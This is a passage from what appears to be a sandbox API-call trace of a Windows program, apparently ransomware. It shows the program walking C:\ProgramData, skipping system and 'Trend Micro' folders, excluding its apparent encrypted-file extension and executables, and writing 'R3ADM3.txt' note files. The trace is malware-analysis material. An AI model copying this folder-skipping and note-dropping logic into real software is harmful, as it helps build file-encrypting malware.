lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0137.014] CloseHandle (hObject=0x2b0) returned 1 [0137.014] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc00 | out: hHeap=0xea0000) returned 1 [0137.014] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6e20 | out: hHeap=0xea0000) returned 1 [0137.014] FindFirstFileW (in: lpFileName="C:\\ProgramData\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x575f9af0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x575f9af0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfc60 [0137.014] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0137.014] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x575f9af0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x575f9af0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0137.014] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0137.014] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0137.014] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0137.014] lstrcmpW (lpString1="Adobe", lpString2=".") returned 1 [0137.014] lstrcmpW (lpString1="Adobe", lpString2="..") returned 1 [0137.015] StrStrIW (lpFirst="Adobe", lpSrch="tmp") returned 0x0 [0137.015] StrStrIW (lpFirst="Adobe", lpSrch="winnt") returned 0x0 [0137.015] StrStrIW (lpFirst="Adobe", lpSrch="temp") returned 0x0 [0137.015] StrStrIW (lpFirst="Adobe", lpSrch="thumb") returned 0x0 [0137.015] StrStrIW (lpFirst="Adobe", lpSrch="$Recycle.Bin") returned 0x0 [0137.015] StrStrIW (lpFirst="Adobe", lpSrch="$RECYCLE.BIN") returned 0x0 [0137.015] StrStrIW (lpFirst="Adobe", lpSrch="System Volume Information") returned 0x0 [0137.015] StrStrIW (lpFirst="Adobe", lpSrch="Boot") returned 0x0 [0137.015] StrStrIW (lpFirst="Adobe", lpSrch="Windows") returned 0x0 [0137.015] StrStrIW (lpFirst="Adobe", lpSrch="Trend Micro") returned 0x0 [0137.015] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6e20 [0137.015] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6df8 [0137.015] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f20 [0137.015] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6df8 | out: hHeap=0xea0000) returned 1 [0137.015] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6e20 | out: hHeap=0xea0000) returned 1 [0137.015] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6e20 [0137.015] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4038 [0137.015] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f20 | out: hHeap=0xea0000) returned 1 [0137.015] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3074f252, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3074f252, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3074f252, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0137.015] lstrcmpW (lpString1="Application Data", lpString2=".") returned 1 [0137.015] lstrcmpW (lpString1="Application Data", lpString2="..") returned 1 [0137.015] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0137.015] lstrcmpW (lpString1="Desktop", lpString2=".") returned 1 [0137.015] lstrcmpW (lpString1="Desktop", lpString2="..") returned 1 [0137.016] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3074f252, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3074f252, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3074f252, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0137.016] lstrcmpW (lpString1="Documents", lpString2=".") returned 1 [0137.016] lstrcmpW (lpString1="Documents", lpString2="..") returned 1 [0137.016] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3074f252, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x3074f252, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x3074f252, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0137.016] lstrcmpW (lpString1="Favorites", lpString2=".") returned 1 [0137.016] lstrcmpW (lpString1="Favorites", lpString2="..") returned 1 [0137.016] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x80ac5760, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x80ac5760, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0137.016] lstrcmpW (lpString1="Microsoft", lpString2=".") returned 1 [0137.016] lstrcmpW (lpString1="Microsoft", lpString2="..") returned 1 [0137.016] StrStrIW (lpFirst="Microsoft", lpSrch="tmp") returned 0x0 [0137.016] StrStrIW (lpFirst="Microsoft", lpSrch="winnt") returned 0x0 [0137.016] StrStrIW (lpFirst="Microsoft", lpSrch="temp") returned 0x0 [0137.016] StrStrIW (lpFirst="Microsoft", lpSrch="thumb") returned 0x0 [0137.016] StrStrIW (lpFirst="Microsoft", lpSrch="$Recycle.Bin") returned 0x0 [0137.016] StrStrIW (lpFirst="Microsoft", lpSrch="$RECYCLE.BIN") returned 0x0 [0137.016] StrStrIW (lpFirst="Microsoft", lpSrch="System Volume Information") returned 0x0 [0137.016] StrStrIW (lpFirst="Microsoft", lpSrch="Boot") returned 0x0 [0137.016] StrStrIW (lpFirst="Microsoft", lpSrch="Windows") returned 0x0 [0137.016] StrStrIW (lpFirst="Microsoft", lpSrch="Trend Micro") returned 0x0 [0137.016] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6df8 [0137.016] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6dd0 [0137.016] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6da8 [0137.016] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc00 [0137.016] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6da8 | out: hHeap=0xea0000) returned 1 [0137.016] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6dd0 | out: hHeap=0xea0000) returned 1 [0137.017] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6df8 | out: hHeap=0xea0000) returned 1 [0137.017] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6df8 [0137.017] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcb28 [0137.017] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc00 | out: hHeap=0xea0000) returned 1 [0137.017] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe79db030, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xed25d0a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xed25d0a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Help", cAlternateFileName="MICROS~2")) returned 1 [0137.017] lstrcmpW (lpString1="Microsoft Help", lpString2=".") returned 1 [0137.017] lstrcmpW (lpString1="Microsoft Help", lpString2="..") returned 1 [0137.017] StrStrIW (lpFirst="Microsoft Help", lpSrch="tmp") returned 0x0 [0137.017] StrStrIW (lpFirst="Microsoft Help", lpSrch="winnt") returned 0x0 [0137.017] StrStrIW (lpFirst="Microsoft Help", lpSrch="temp") returned 0x0 [0137.017] StrStrIW (lpFirst="Microsoft Help", lpSrch="thumb") returned 0x0 [0137.017] StrStrIW (lpFirst="Microsoft Help", lpSrch="$Recycle.Bin") returned 0x0 [0137.017] StrStrIW (lpFirst="Microsoft Help", lpSrch="$RECYCLE.BIN") returned 0x0 [0137.017] StrStrIW (lpFirst="Microsoft Help", lpSrch="System Volume Information") returned 0x0 [0137.017] StrStrIW (lpFirst="Microsoft Help", lpSrch="Boot") returned 0x0 [0137.017] StrStrIW (lpFirst="Microsoft Help", lpSrch="Windows") returned 0x0 [0137.017] StrStrIW (lpFirst="Microsoft Help", lpSrch="Trend Micro") returned 0x0 [0137.017] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6dd0 [0137.017] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6da8 [0137.017] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6d80 [0137.017] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc00 [0137.017] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6d80 | out: hHeap=0xea0000) returned 1 [0137.017] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6da8 | out: hHeap=0xea0000) returned 1 [0137.017] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6dd0 | out: hHeap=0xea0000) returned 1 [0137.017] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6dd0 [0137.018] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcae0 [0137.018] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc00 | out: hHeap=0xea0000) returned 1 [0137.018] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8556a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xaf8556a0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Mozilla", cAlternateFileName="")) returned 1 [0137.018] lstrcmpW (lpString1="Mozilla", lpString2=".") returned 1 [0137.018] lstrcmpW (lpString1="Mozilla", lpString2="..") returned 1 [0137.018] StrStrIW (lpFirst="Mozilla", lpSrch="tmp") returned 0x0 [0137.018] StrStrIW (lpFirst="Mozilla", lpSrch="winnt") returned 0x0 [0137.018] StrStrIW (lpFirst="Mozilla", lpSrch="temp") returned 0x0 [0137.018] StrStrIW (lpFirst="Mozilla", lpSrch="thumb") returned 0x0 [0137.018] StrStrIW (lpFirst="Mozilla", lpSrch="$Recycle.Bin") returned 0x0 [0137.018] StrStrIW (lpFirst="Mozilla", lpSrch="$RECYCLE.BIN") returned 0x0 [0137.018] StrStrIW (lpFirst="Mozilla", lpSrch="System Volume Information") returned 0x0 [0137.018] StrStrIW (lpFirst="Mozilla", lpSrch="Boot") returned 0x0 [0137.018] StrStrIW (lpFirst="Mozilla", lpSrch="Windows") returned 0x0 [0137.018] StrStrIW (lpFirst="Mozilla", lpSrch="Trend Micro") returned 0x0 [0137.018] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6da8 [0137.018] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6d80 [0137.018] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f20 [0137.018] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6d80 | out: hHeap=0xea0000) returned 1 [0137.018] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6da8 | out: hHeap=0xea0000) returned 1 [0137.018] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6da8 [0137.018] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0137.018] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f20 | out: hHeap=0xea0000) returned 1 [0137.018] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7e3c6d00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7e3c6d00, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7eea3160, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Oracle", cAlternateFileName="")) returned 1 [0137.018] lstrcmpW (lpString1="Oracle", lpString2=".") returned 1 [0137.019] lstrcmpW (lpString1="Oracle", lpString2="..") returned 1 [0137.019] StrStrIW (lpFirst="Oracle", lpSrch="tmp") returned 0x0 [0137.019] StrStrIW (lpFirst="Oracle", lpSrch="winnt") returned 0x0 [0137.019] StrStrIW (lpFirst="Oracle", lpSrch="temp") returned 0x0 [0137.019] StrStrIW (lpFirst="Oracle", lpSrch="thumb") returned 0x0 [0137.019] StrStrIW (lpFirst="Oracle", lpSrch="$Recycle.Bin") returned 0x0 [0137.019] StrStrIW (lpFirst="Oracle", lpSrch="$RECYCLE.BIN") returned 0x0 [0137.019] StrStrIW (lpFirst="Oracle", lpSrch="System Volume Information") returned 0x0 [0137.019] StrStrIW (lpFirst="Oracle", lpSrch="Boot") returned 0x0 [0137.019] StrStrIW (lpFirst="Oracle", lpSrch="Windows") returned 0x0 [0137.019] StrStrIW (lpFirst="Oracle", lpSrch="Trend Micro") returned 0x0 [0137.019] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6d80 [0137.019] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6d58 [0137.019] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f20 [0137.019] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6d58 | out: hHeap=0xea0000) returned 1 [0137.019] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6d80 | out: hHeap=0xea0000) returned 1 [0137.019] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6d80 [0137.019] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4070 [0137.019] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f20 | out: hHeap=0xea0000) returned 1 [0137.019] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xecce51e0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4819be0, ftLastAccessTime.dwHighDateTime=0x1d2fc28, ftLastWriteTime.dwLowDateTime=0x4819be0, ftLastWriteTime.dwHighDateTime=0x1d2fc28, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Package Cache", cAlternateFileName="PACKAG~1")) returned 1 [0137.019] lstrcmpW (lpString1="Package Cache", lpString2=".") returned 1 [0137.019] lstrcmpW (lpString1="Package Cache", lpString2="..") returned 1 [0137.019] StrStrIW (lpFirst="Package Cache", lpSrch="tmp") returned 0x0 [0137.019] StrStrIW (lpFirst="Package Cache", lpSrch="winnt") returned 0x0 [0137.019] StrStrIW (lpFirst="Package Cache", lpSrch="temp") returned 0x0 [0137.020] StrStrIW (lpFirst="Package Cache", lpSrch="thumb") returned 0x0 [0137.020] StrStrIW (lpFirst="Package Cache", lpSrch="$Recycle.Bin") returned 0x0 [0137.020] StrStrIW (lpFirst="Package Cache", lpSrch="$RECYCLE.BIN") returned 0x0 [0137.020] StrStrIW (lpFirst="Package Cache", lpSrch="System Volume Information") returned 0x0 [0137.020] StrStrIW (lpFirst="Package Cache", lpSrch="Boot") returned 0x0 [0137.020] StrStrIW (lpFirst="Package Cache", lpSrch="Windows") returned 0x0 [0137.020] StrStrIW (lpFirst="Package Cache", lpSrch="Trend Micro") returned 0x0 [0137.020] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6d58 [0137.020] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6970 [0137.020] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6948 [0137.020] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc00 [0137.020] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6948 | out: hHeap=0xea0000) returned 1 [0137.020] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6970 | out: hHeap=0xea0000) returned 1 [0137.020] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6d58 | out: hHeap=0xea0000) returned 1 [0137.020] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6d58 [0137.020] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc8e8 [0137.020] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc00 | out: hHeap=0xea0000) returned 1 [0137.020] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x575f9af0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x575f9af0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x575f9af0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0137.020] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0137.020] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0137.020] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0137.020] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0137.020] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0137.020] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0137.020] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0137.021] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0137.021] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0137.021] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307753b3, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307753b3, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307753b3, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0137.021] lstrcmpW (lpString1="Start Menu", lpString2=".") returned 1 [0137.021] lstrcmpW (lpString1="Start Menu", lpString2="..") returned 1 [0137.021] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x803771e0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x803771e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x803771e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Sun", cAlternateFileName="")) returned 1 [0137.021] lstrcmpW (lpString1="Sun", lpString2=".") returned 1 [0137.021] lstrcmpW (lpString1="Sun", lpString2="..") returned 1 [0137.021] StrStrIW (lpFirst="Sun", lpSrch="tmp") returned 0x0 [0137.021] StrStrIW (lpFirst="Sun", lpSrch="winnt") returned 0x0 [0137.021] StrStrIW (lpFirst="Sun", lpSrch="temp") returned 0x0 [0137.021] StrStrIW (lpFirst="Sun", lpSrch="thumb") returned 0x0 [0137.021] StrStrIW (lpFirst="Sun", lpSrch="$Recycle.Bin") returned 0x0 [0137.021] StrStrIW (lpFirst="Sun", lpSrch="$RECYCLE.BIN") returned 0x0 [0137.021] StrStrIW (lpFirst="Sun", lpSrch="System Volume Information") returned 0x0 [0137.021] StrStrIW (lpFirst="Sun", lpSrch="Boot") returned 0x0 [0137.021] StrStrIW (lpFirst="Sun", lpSrch="Windows") returned 0x0 [0137.021] StrStrIW (lpFirst="Sun", lpSrch="Trend Micro") returned 0x0 [0137.021] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6970 [0137.021] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6948 [0137.021] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f20 [0137.021] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6948 | out: hHeap=0xea0000) returned 1 [0137.021] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6970 | out: hHeap=0xea0000) returned 1 [0137.021] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6970 [0137.021] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee40a8 [0137.022] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f20 | out: hHeap=0xea0000) returned 1 [0137.022] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307753b3, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307753b3, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307753b3, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0137.022] lstrcmpW (lpString1="Templates", lpString2=".") returned 1 [0137.022] lstrcmpW (lpString1="Templates", lpString2="..") returned 1 [0137.022] FindNextFileW (in: hFindFile=0xecfc60, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307753b3, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307753b3, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307753b3, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 0 [0137.022] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2db0 | out: hHeap=0xea0000) returned 1 [0137.022] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2d60 | out: hHeap=0xea0000) returned 1 [0137.022] FindClose (in: hFindFile=0xecfc60 | out: hFindFile=0xecfc60) returned 1 [0137.022] Sleep (dwMilliseconds=0x32) [0137.077] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f58 | out: hHeap=0xea0000) returned 1 [0137.077] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6e48 | out: hHeap=0xea0000) returned 1 [0137.077] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6e48 [0137.077] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee3c10 [0137.077] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee3c38 [0137.077] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3c10 | out: hHeap=0xea0000) returned 1 [0137.077] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee3c10 [0137.078] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6ea0 [0137.078] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6ec8 [0137.078] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6ef0 [0137.078] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f58 [0137.078] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6ef0 | out: hHeap=0xea0000) returned 1 [0137.078] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6ec8 | out: hHeap=0xea0000) returned 1 [0137.078] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6ea0 | out: hHeap=0xea0000) returned 1 [0137.078] CreateFileW (lpFileName="C:\\Recovery\\R3ADM3.txt" (normalized: "c:\\recovery\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, 